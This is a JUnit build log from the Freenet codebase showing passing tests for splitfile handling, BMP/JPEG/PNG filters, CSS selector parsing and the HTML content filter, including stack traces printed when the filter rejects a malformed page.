    [junit] Testcase: testSmallSplitfileFailureMaxRetries took 0,055 sec
    [junit] Testcase: testSmallSplitfileHasKeys took 0,054 sec
    [junit] Testcase: testSmallSplitfileCompletion took 0,091 sec
    [junit] Testcase: testRepeatedEncodeAfterShutdown took 33,799 sec
    [junit] Testcase: testRoundTripSimple took 73,584 sec
    [junit] Testcase: testResumeCrossSegment took 0,001 sec
    [junit] Testcase: testSmallSplitfileChooseCooldownNotRNF took 0,086 sec
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockCompletion took 0,114 sec
    [junit] Testcase: testSmallSplitfileChooseCompletion took 0,098 sec
    [junit] Testcase: testSmallSplitfileConsecutiveRNFsHack took 0,116 sec
    [junit] Testcase: testCancelAlt took 0,13 sec
    [junit] Testcase: testSmallSplitfileNoLastBlock took 0,053 sec
    [junit] Testcase: testRoundTripDataBlocksOnly took 78,865 sec
    [junit] Testcase: testCancel took 0,317 sec
    [junit] Testcase: testSmallSplitfileWithLastBlock took 0,107 sec
    [junit] Testcase: testRoundTripCrossSegment took 0 sec
    [junit] Testcase: testPersistentSmallSplitfileNoLastBlockChooseAfterResume took 0,361 sec
    [junit] Running freenet.client.filter.BMPFilterTest
    [junit] Testsuite: freenet.client.filter.BMPFilterTest
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,687 sec
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 1,687 sec
    [junit] 
    [junit] Testcase: testInvalidImageResolution took 0,983 sec
    [junit] Testcase: testImageSizeCalculationWithPadding took 0,08 sec
    [junit] Testcase: testValidImage took 0,016 sec
    [junit] Testcase: testInvalidNumberOfPlanes took 0,011 sec
    [junit] Testcase: testNotEnoughImageData took 0,006 sec
    [junit] Testcase: testInvalidBitDepth took 0,004 sec
    [junit] Testcase: testImageSizeCalculationWithoutPadding took 0,007 sec
    [junit] Testcase: testInvalidBitmapInfoHeaderSize took 0,008 sec
    [junit] Testcase: testIllegalStartWord took 0,004 sec
    [junit] Testcase: testInvalidOffset took 0,003 sec
    [junit] Testcase: testInvalidCompressionType took 0,004 sec
    [junit] Testcase: testTooShortImage took 0,004 sec
    [junit] Testcase: testNegativeImageWidth took 0,005 sec
    [junit] Testcase: testInvalidImageDataSize took 0,004 sec
    [junit] Running freenet.client.filter.CSSParserTest
    [junit] Testsuite: freenet.client.filter.CSSParserTest
    [junit] CSS3 test0 : h1:nth-of-type(odd) {} -> h1:nth-of-type(odd)
    [junit] CSS3 test1 : tr:nth-child(n+1) {} -> tr:nth-child(n+1)
    [junit] CSS3 test2 : tr:nth-child(+1) {} -> tr:nth-child(+1)
    [junit] CSS3 test3 : tr:nth-child(2n-1) {} -> tr:nth-child(2n-1)
    [junit] CSS3 test4 : tr:nth-child(-2n+1) {} -> tr:nth-child(-2n+1)
    [junit] CSS3 test5 : h1:nth-last-of-type(1) {} -> h1:nth-last-of-type(1)
    [junit] CSS3 test6 : tr:nth-child(1) {} -> tr:nth-child(1)
    [junit] CSS3 test7 : tr:nth-child(even) { background-color: yellow; } -> tr:nth-child(even) { background-color: yellow; }
    [junit] CSS3 test8 : tr:nth-child(n) {} -> tr:nth-child(n)
    [junit] CSS3 test9 : tr:nth-child(-n-1) {} -> tr:nth-child(-n-1)
    [junit] CSS3 test10 : tr:nth-child(-1) {} -> tr:nth-child(-1)
    [junit] CSS3 test11 : tr:nth-child(2n) {} -> tr:nth-child(2n)
    [junit] CSS3 test12 : tr:nth-child(-999999) {} -> tr:nth-child(-999999)
    [junit] CSS3 test13 : tr:nth-child(odd) { background-color: red; } -> tr:nth-child(odd) { background-color: red; }
    [junit] CSS3 test14 : tr:nth-child(10n) {} -> tr:nth-child(10n)
    [junit] CSS3 test15 : h1:nth-of-type(1) {} -> h1:nth-of-type(1)
    [junit] CSS3 test16 : tr:nth-last-child(even) {} -> tr:nth-last-child(even)
    [junit] CSS3 test17 : h1:nth-last-of-type(odd) {} -> h1:nth-last-of-type(odd)
    [junit] CSS3 test18 : tr:nth-child(n-1) {} -> tr:nth-child(n-1)
    [junit] CSS3 test19 : tr:nth-child(10) {} -> tr:nth-child(10)
    [junit] CSS3 test20 : tr:nth-last-child(1) {} -> tr:nth-last-child(1)
    [junit] CSS3 test21 : tr:nth-child(100) {} -> tr:nth-child(100)
    [junit] CSS3 test22 : tr:nth-last-child(odd) {} -> tr:nth-last-child(odd)
    [junit] CSS3 test23 : h1:nth-last-of-type(even) {} -> h1:nth-last-of-type(even)
    [junit] CSS3 test24 : tr:nth-child(-n+1) {} -> tr:nth-child(-n+1)
    [junit] CSS3 test25 : tr:nth-child(999999) {} -> tr:nth-child(999999)
    [junit] CSS3 test26 : tr:nth-child(-n) {} -> tr:nth-child(-n)
    [junit] CSS3 test27 : h1:nth-of-type(even) {} -> h1:nth-of-type(even)
    [junit] CSS3 test28 : tr:nth-child(-2n-1) {} -> tr:nth-child(-2n-1)
    [junit] CSS3 test29 : tr:nth-child(2n+1) {} -> tr:nth-child(2n+1)
    [junit] CSS3 test30 : tr:nth-child(n+10) {} -> tr:nth-child(n+10)
    [junit] CSS3 bad selector test 0
    [junit] CSS3 bad selector test 1
    [junit] CSS3 bad selector test 2
    [junit] CSS3 bad selector test 3
    [junit] CSS3 bad selector test 4
    [junit] CSS3 bad selector test 5
    [junit] CSS3 bad selector test 6
    [junit] CSS3 bad selector test 7
    [junit] CSS3 bad selector test 8
    [junit] CSS3 bad selector test 9
    [junit] CSS3 bad selector test 10
    [junit] CSS3 bad selector test 11
    [junit] CSS3 bad selector test 12
    [junit] CSS3 bad selector test 13
    [junit] CSS3 bad selector test 14
    [junit] CSS3 bad selector test 15
    [junit] CSS3 bad selector test 16
    [junit] CSS3 bad selector test 17
    [junit] CSS3 bad selector test 18
    [junit] CSS3 bad selector test 19
    [junit] CSS3 bad selector test 20
    [junit] CSS3 bad selector test 21
    [junit] CSS3 bad selector test 22
    [junit] CSS3 bad selector test 23
    [junit] CSS3 bad selector test 24
    [junit] CSS3 bad selector test 25
    [junit] CSS3 bad selector test 26
    [junit] CSS3 bad selector test 27
    [junit] CSS3 bad selector test 28
    [junit] CSS3 bad selector test 29
    [junit] Test 0 : div * p { color: blue;} -> div * p { color: blue;}
    [junit] Test 1 : p.marine.pastoral { color: green } -> p.marine.pastoral
    [junit] Test 2 : h1[foo="bar+bar"] {} -> h1[foo="bar+bar"]
    [junit] Test 3 : p:first-child em { font-weight : bold } -> p:first-child em { font-weight: bold }
    [junit] Test 4 : a:focus:hover { background: white;} -> a:focus:hover { background: white;}
    [junit] Test 5 : span[class=example] { color: blue; } -> span[class=example] { color: blue; }
    [junit] Test 6 : div ol>li p { color: green;} -> div ol>li p { color: green;}
    [junit] Test 7 : h1[foo="bar bar"] {} -> h1[foo="bar bar"]
    [junit] Test 8 : .warning {} -> .warning {}
    [junit] Test 9 : h1#chapter1 {} -> h1#chapter1 {}
    [junit] Test 10 : a.external:visited { color: blue } -> 
    [junit] Test 11 : div > p:FIRST-CHILD { text-indent: 0 } -> div>p:FIRST-CHILD { text-indent: 0 }
    [junit] Test 12 : h1[foo] h2 > p + b { color: green;} -> h1[foo] h2>p+b { color: green;}
    [junit] Test 13 : h1[foo] {} -> h1[foo]
    [junit] Test 14 : * > a:first-child {} -> *>a:first-child {}
    [junit] Test 15 : div p *[href] { color: blue;} -> div p *[href] { color: blue;}
    [junit] Test 16 : h1[foo="\"test\""] {} -> h1[foo="\"test\""] {}
    [junit] Test 17 : h1[foo="hello\202 "] {} -> h1[foo="hello\202 "] {}
    [junit] Test 18 : h1:first-child {} -> h1:first-child
    [junit] Test 19 : h1[foo="bar"] {} -> h1[foo="bar"]
    [junit] Test 20 : a:focus:hover { background: white } -> a:focus:hover { background: white }
    [junit] Test 21 : h1[foo] h2 > p + b:before { color: green;} -> h1[foo] h2>p+b:before { color: green;}
    [junit] Test 22 : #myid {} -> #myid {}
    [junit] Test 23 : h1[foo=bar] {} -> h1[foo=bar] {}
    [junit] Test 24 : td { border-right: hidden; border-bottom: hidden } -> td { border-right: hidden; border-bottom: hidden }
    [junit] Test 25 : h1[foo~="bar"] {} -> h1[foo~="bar"]
    [junit] Test 26 : :link { color: red } -> :link { color: red }
    [junit] Test 27 : span[hello="Cleveland"][goodbye="Columbus"] { color: blue; } -> span[hello="Cleveland"][goodbye="Columbus"] { color: blue; }
    [junit] Test 28 : [lang=fr] {} -> [lang=fr] {}
    [junit] Test 29 : h1[foo|="en"] {} -> h1[foo|="en"]
    [junit] Test 30 : h1 + h2 { margin-top: -5mm } -> h1+h2 { margin-top: -5mm }
    [junit] Test 31 : p:first-letter { font-size: 3em; font-weight: normal } -> p:first-letter { font-size: 3em; font-weight: normal }
    [junit] Test 32 : h1.opener + h2 { margin-top: -5mm } -> h1.opener+h2 { margin-top: -5mm }
    [junit] Test 33 : table          { border-collapse: collapse; border: 5px solid yellow; } *#col1         { border: 3px solid black; } td             { border: 1px solid red; padding: 1em; } td.cell5       { border: 5px dashed blue; } td.cell6       { border: 5px solid green; } -> table { border-collapse: collapse; border: 5px solid yellow; } *#col1 { border: 3px solid black; } td { border: 1px solid red; padding: 1em; } td.cell5 { border: 5px dashed blue; } td.cell6 { border: 5px solid green; }
    [junit] Test 34 : div > p:first-child { text-indent: 0 } -> div>p:first-child { text-indent: 0 }
    [junit] Test 35 : p[example="public class foo\
    [junit] {\
    [junit]     private int x;\
    [junit] \
    [junit]     foo(int x) {\
    [junit]         this.x = x;\
    [junit]     }\
    [junit] \
    [junit] }"] { color: red } -> p[example="public class foo{    private int x;    foo(int x) {        this.x = x;    }}"] { color: red }
    [junit] Test 36 : h1:lang(fr) {} -> h1:lang(fr)
    [junit] Test 37 : div.foo {} -> div.foo
    [junit] Test 38 : h1>h2 {} -> h1>h2
    [junit] Test 39 : [foo|="en"] {} -> [foo|="en"]
    [junit] Test 40 : p:first-line { text-transform: uppercase;} -> p:first-line { text-transform: uppercase;}
    [junit] Test 41 : h1+h2 {} -> h1+h2
    [junit] Test 42 : h1 em { color: blue;} -> h1 em { color: blue;}
    [junit] Test 43 : body > P { line-height: 1.3 } -> body>P { line-height: 1.3 }
    [junit] Test 44 : h1[foo="bar\" bar"] {} -> h1[foo="bar\" bar"]
    [junit] Test 45 : * {} -> *
    [junit] Bad selector test 0
    [junit] Bad selector test 1
    [junit] Bad selector test 2
    [junit] Bad selector test 3
    [junit] Bad selector test 4
    [junit] Bad selector test 5
    [junit] Bad selector test 6
    [junit] Bad selector test 7
    [junit] Bad selector test 8
    [junit] Bad selector test 9
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,167 sec
    [junit] Tests run: 14, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 11,167 sec
    [junit] ------------- Standard Error -----------------
    [junit] CSS3 test0 : h1:nth-of-type(odd) {} -> h1:nth-of-type(odd)
    [junit] CSS3 test1 : tr:nth-child(n+1) {} -> tr:nth-child(n+1)
    [junit] CSS3 test2 : tr:nth-child(+1) {} -> tr:nth-child(+1)
    [junit] CSS3 test3 : tr:nth-child(2n-1) {} -> tr:nth-child(2n-1)
    [junit] CSS3 test4 : tr:nth-child(-2n+1) {} -> tr:nth-child(-2n+1)
    [junit] CSS3 test5 : h1:nth-last-of-type(1) {} -> h1:nth-last-of-type(1)
    [junit] CSS3 test6 : tr:nth-child(1) {} -> tr:nth-child(1)
    [junit] CSS3 test7 : tr:nth-child(even) { background-color: yellow; } -> tr:nth-child(even) { background-color: yellow; }
    [junit] CSS3 test8 : tr:nth-child(n) {} -> tr:nth-child(n)
    [junit] CSS3 test9 : tr:nth-child(-n-1) {} -> tr:nth-child(-n-1)
    [junit] CSS3 test10 : tr:nth-child(-1) {} -> tr:nth-child(-1)
    [junit] CSS3 test11 : tr:nth-child(2n) {} -> tr:nth-child(2n)
    [junit] CSS3 test12 : tr:nth-child(-999999) {} -> tr:nth-child(-999999)
    [junit] CSS3 test13 : tr:nth-child(odd) { background-color: red; } -> tr:nth-child(odd) { background-color: red; }
    [junit] CSS3 test14 : tr:nth-child(10n) {} -> tr:nth-child(10n)
    [junit] CSS3 test15 : h1:nth-of-type(1) {} -> h1:nth-of-type(1)
    [junit] CSS3 test16 : tr:nth-last-child(even) {} -> tr:nth-last-child(even)
    [junit] CSS3 test17 : h1:nth-last-of-type(odd) {} -> h1:nth-last-of-type(odd)
    [junit] CSS3 test18 : tr:nth-child(n-1) {} -> tr:nth-child(n-1)
    [junit] CSS3 test19 : tr:nth-child(10) {} -> tr:nth-child(10)
    [junit] CSS3 test20 : tr:nth-last-child(1) {} -> tr:nth-last-child(1)
    [junit] CSS3 test21 : tr:nth-child(100) {} -> tr:nth-child(100)
    [junit] CSS3 test22 : tr:nth-last-child(odd) {} -> tr:nth-last-child(odd)
    [junit] CSS3 test23 : h1:nth-last-of-type(even) {} -> h1:nth-last-of-type(even)
    [junit] CSS3 test24 : tr:nth-child(-n+1) {} -> tr:nth-child(-n+1)
    [junit] CSS3 test25 : tr:nth-child(999999) {} -> tr:nth-child(999999)
    [junit] CSS3 test26 : tr:nth-child(-n) {} -> tr:nth-child(-n)
    [junit] CSS3 test27 : h1:nth-of-type(even) {} -> h1:nth-of-type(even)
    [junit] CSS3 test28 : tr:nth-child(-2n-1) {} -> tr:nth-child(-2n-1)
    [junit] CSS3 test29 : tr:nth-child(2n+1) {} -> tr:nth-child(2n+1)
    [junit] CSS3 test30 : tr:nth-child(n+10) {} -> tr:nth-child(n+10)
    [junit] CSS3 bad selector test 0
    [junit] CSS3 bad selector test 1
    [junit] CSS3 bad selector test 2
    [junit] CSS3 bad selector test 3
    [junit] CSS3 bad selector test 4
    [junit] CSS3 bad selector test 5
    [junit] CSS3 bad selector test 6
    [junit] CSS3 bad selector test 7
    [junit] CSS3 bad selector test 8
    [junit] CSS3 bad selector test 9
    [junit] CSS3 bad selector test 10
    [junit] CSS3 bad selector test 11
    [junit] CSS3 bad selector test 12
    [junit] CSS3 bad selector test 13
    [junit] CSS3 bad selector test 14
    [junit] CSS3 bad selector test 15
    [junit] CSS3 bad selector test 16
    [junit] CSS3 bad selector test 17
    [junit] CSS3 bad selector test 18
    [junit] CSS3 bad selector test 19
    [junit] CSS3 bad selector test 20
    [junit] CSS3 bad selector test 21
    [junit] CSS3 bad selector test 22
    [junit] CSS3 bad selector test 23
    [junit] CSS3 bad selector test 24
    [junit] CSS3 bad selector test 25
    [junit] CSS3 bad selector test 26
    [junit] CSS3 bad selector test 27
    [junit] CSS3 bad selector test 28
    [junit] CSS3 bad selector test 29
    [junit] Test 0 : div * p { color: blue;} -> div * p { color: blue;}
    [junit] Test 1 : p.marine.pastoral { color: green } -> p.marine.pastoral
    [junit] Test 2 : h1[foo="bar+bar"] {} -> h1[foo="bar+bar"]
    [junit] Test 3 : p:first-child em { font-weight : bold } -> p:first-child em { font-weight: bold }
    [junit] Test 4 : a:focus:hover { background: white;} -> a:focus:hover { background: white;}
    [junit] Test 5 : span[class=example] { color: blue; } -> span[class=example] { color: blue; }
    [junit] Test 6 : div ol>li p { color: green;} -> div ol>li p { color: green;}
    [junit] Test 7 : h1[foo="bar bar"] {} -> h1[foo="bar bar"]
    [junit] Test 8 : .warning {} -> .warning {}
    [junit] Test 9 : h1#chapter1 {} -> h1#chapter1 {}
    [junit] Test 10 : a.external:visited { color: blue } -> 
    [junit] Test 11 : div > p:FIRST-CHILD { text-indent: 0 } -> div>p:FIRST-CHILD { text-indent: 0 }
    [junit] Test 12 : h1[foo] h2 > p + b { color: green;} -> h1[foo] h2>p+b { color: green;}
    [junit] Test 13 : h1[foo] {} -> h1[foo]
    [junit] Test 14 : * > a:first-child {} -> *>a:first-child {}
    [junit] Test 15 : div p *[href] { color: blue;} -> div p *[href] { color: blue;}
    [junit] Test 16 : h1[foo="\"test\""] {} -> h1[foo="\"test\""] {}
    [junit] Test 17 : h1[foo="hello\202 "] {} -> h1[foo="hello\202 "] {}
    [junit] Test 18 : h1:first-child {} -> h1:first-child
    [junit] Test 19 : h1[foo="bar"] {} -> h1[foo="bar"]
    [junit] Test 20 : a:focus:hover { background: white } -> a:focus:hover { background: white }
    [junit] Test 21 : h1[foo] h2 > p + b:before { color: green;} -> h1[foo] h2>p+b:before { color: green;}
    [junit] Test 22 : #myid {} -> #myid {}
    [junit] Test 23 : h1[foo=bar] {} -> h1[foo=bar] {}
    [junit] Test 24 : td { border-right: hidden; border-bottom: hidden } -> td { border-right: hidden; border-bottom: hidden }
    [junit] Test 25 : h1[foo~="bar"] {} -> h1[foo~="bar"]
    [junit] Test 26 : :link { color: red } -> :link { color: red }
    [junit] Test 27 : span[hello="Cleveland"][goodbye="Columbus"] { color: blue; } -> span[hello="Cleveland"][goodbye="Columbus"] { color: blue; }
    [junit] Test 28 : [lang=fr] {} -> [lang=fr] {}
    [junit] Test 29 : h1[foo|="en"] {} -> h1[foo|="en"]
    [junit] Test 30 : h1 + h2 { margin-top: -5mm } -> h1+h2 { margin-top: -5mm }
    [junit] Test 31 : p:first-letter { font-size: 3em; font-weight: normal } -> p:first-letter { font-size: 3em; font-weight: normal }
    [junit] Test 32 : h1.opener + h2 { margin-top: -5mm } -> h1.opener+h2 { margin-top: -5mm }
    [junit] Test 33 : table          { border-collapse: collapse; border: 5px solid yellow; } *#col1         { border: 3px solid black; } td             { border: 1px solid red; padding: 1em; } td.cell5       { border: 5px dashed blue; } td.cell6       { border: 5px solid green; } -> table { border-collapse: collapse; border: 5px solid yellow; } *#col1 { border: 3px solid black; } td { border: 1px solid red; padding: 1em; } td.cell5 { border: 5px dashed blue; } td.cell6 { border: 5px solid green; }
    [junit] Test 34 : div > p:first-child { text-indent: 0 } -> div>p:first-child { text-indent: 0 }
    [junit] Test 35 : p[example="public class foo\
    [junit] {\
    [junit]     private int x;\
    [junit] \
    [junit]     foo(int x) {\
    [junit]         this.x = x;\
    [junit]     }\
    [junit] \
    [junit] }"] { color: red } -> p[example="public class foo{    private int x;    foo(int x) {        this.x = x;    }}"] { color: red }
    [junit] Test 36 : h1:lang(fr) {} -> h1:lang(fr)
    [junit] Test 37 : div.foo {} -> div.foo
    [junit] Test 38 : h1>h2 {} -> h1>h2
    [junit] Test 39 : [foo|="en"] {} -> [foo|="en"]
    [junit] Test 40 : p:first-line { text-transform: uppercase;} -> p:first-line { text-transform: uppercase;}
    [junit] Test 41 : h1+h2 {} -> h1+h2
    [junit] Test 42 : h1 em { color: blue;} -> h1 em { color: blue;}
    [junit] Test 43 : body > P { line-height: 1.3 } -> body>P { line-height: 1.3 }
    [junit] Test 44 : h1[foo="bar\" bar"] {} -> h1[foo="bar\" bar"]
    [junit] Test 45 : * {} -> *
    [junit] Bad selector test 0
    [junit] Bad selector test 1
    [junit] Bad selector test 2
    [junit] Bad selector test 3
    [junit] Bad selector test 4
    [junit] Bad selector test 5
    [junit] Bad selector test 6
    [junit] Bad selector test 7
    [junit] Bad selector test 8
    [junit] Bad selector test 9
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testCSS3Selector took 1,92 sec
    [junit] Testcase: testProperties took 4,308 sec
    [junit] Testcase: testMaybeCharset took 0,986 sec
    [junit] Testcase: testWhitespace took 0,194 sec
    [junit] Testcase: testCSS2Selector took 0,411 sec
    [junit] Testcase: testBackgroundURL took 0,252 sec
    [junit] Testcase: testTripleCommentStart took 0,201 sec
    [junit] Testcase: testCharset took 0,832 sec
    [junit] Testcase: testComment took 0,185 sec
    [junit] Testcase: testEscape took 0,183 sec
    [junit] Testcase: testImports took 0,446 sec
    [junit] Testcase: testCSS1Selector took 0,196 sec
    [junit] Testcase: testDoubleCommentStart took 0,196 sec
    [junit] Testcase: testNewlines took 0,199 sec
    [junit] Running freenet.client.filter.ContentFilterTest$TagVerifierTest
    [junit] Testsuite: freenet.client.filter.ContentFilterTest$TagVerifierTest
    [junit] Tests run: 10, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,271 sec
    [junit] Tests run: 10, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 2,271 sec
    [junit] 
    [junit] Testcase: testMetaTagHTMLContentType took 1,351 sec
    [junit] Testcase: testFormTag took 0,013 sec
    [junit] Testcase: testInvalidInputTag took 0,005 sec
    [junit] Testcase: testMetaTagXHTMLContentType took 0,004 sec
    [junit] Testcase: testInvalidFormMethod took 0,003 sec
    [junit] Testcase: testBodyTag took 0,003 sec
    [junit] Testcase: testLinkTag took 0,308 sec
    [junit] Testcase: testMetaTagUnknownContentType took 0,004 sec
    [junit] Testcase: testHTMLTagWithInvalidNS took 0,005 sec
    [junit] Testcase: testValidInputTag took 0,003 sec
    [junit] Running freenet.client.filter.ContentFilterTest
    [junit] Testsuite: freenet.client.filter.ContentFilterTest
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:293)
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,544 sec
    [junit] Tests run: 4, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 4,544 sec
    [junit] ------------- Standard Output ---------------
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit] Failure: Corrupt or malicious web page (unable to filter the page)!
    [junit] ------------- ---------------- ---------------
    [junit] ------------- Standard Error -----------------
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:293)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at freenet.client.filter.ContentFilter.filter(ContentFilter.java:294)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:309)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] Corrupt or malicious web page (unable to filter the page)!
    [junit]     at freenet.client.filter.HTMLFilter.throwFilterException(HTMLFilter.java:701)
    [junit]     at freenet.client.filter.HTMLFilter$HTMLParseContext.run(HTMLFilter.java:296)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit]     at freenet.client.filter.HTMLFilter.readFilter(HTMLFilter.java:84)
    [junit]     at freenet.client.filter.ContentFilter.filter(ContentFilter.java:294)
    [junit]     at freenet.client.filter.ContentFilterTest.testEvilCharset(ContentFilterTest.java:309)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
    [junit]     at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:57)
    [junit]     at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
    [junit]     at java.lang.reflect.Method.invoke(Method.java:606)
    [junit]     at junit.framework.TestCase.runTest(TestCase.java:176)
    [junit]     at junit.framework.TestCase.runBare(TestCase.java:141)
    [junit]     at junit.framework.TestResult$1.protect(TestResult.java:122)
    [junit]     at junit.framework.TestResult.runProtected(TestResult.java:142)
    [junit]     at junit.framework.TestResult.run(TestResult.java:125)
    [junit]     at junit.framework.TestCase.run(TestCase.java:129)
    [junit]     at junit.framework.TestSuite.runTest(TestSuite.java:255)
    [junit]     at junit.framework.TestSuite.run(TestSuite.java:250)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.run(JUnitTestRunner.java:523)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.launch(JUnitTestRunner.java:1063)
    [junit]     at org.apache.tools.ant.taskdefs.optional.junit.JUnitTestRunner.main(JUnitTestRunner.java:914)
    [junit] ------------- ---------------- ---------------
    [junit] 
    [junit] Testcase: testMetaRefresh took 2,4 sec
    [junit] Testcase: testLowerCaseExtensions took 0,005 sec
    [junit] Testcase: testHTMLFilter took 1,575 sec
    [junit] Testcase: testEvilCharset took 0,055 sec
    [junit] Running freenet.client.filter.FilterUtilsTest
    [junit] Testsuite: freenet.client.filter.FilterUtilsTest
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,555 sec
    [junit] Tests run: 2, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,555 sec
    [junit] 
    [junit] Testcase: testInvalidLengthUnits took 0,064 sec
    [junit] Testcase: testValidLenthUnits took 0,011 sec
    [junit] Running freenet.client.filter.JPEGFilterTest
    [junit] Testsuite: freenet.client.filter.JPEGFilterTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,564 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,564 sec
    [junit] 
    [junit] Testcase: testThatAThumbnailExtensionCodeIsPreserved took 0,085 sec
    [junit] Running freenet.client.filter.PNGFilterTest
    [junit] Testsuite: freenet.client.filter.PNGFilterTest
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,801 sec
    [junit] Tests run: 1, Failures: 0, Errors: 0, Skipped: 0, Time elapsed: 0,801 sec
    [junit] 
    [junit] Testcase: testSuiteTest took 0,334 sec
    [junit] Running freenet.clients.fcp.FCPPluginConnectionImplTest
    [junit] Testsuite: freenet.clients.fcp.FCPPluginConnectionImplTest
    [junit] Attempting to load the NativeThread library [jar:file:/home/arne/fred-work/lib/freenet/freenet-ext.jar!/freenet/support/io/libNativeThread-amd64.so]
    [junit] Using the NativeThread implementation (base nice level is 0)
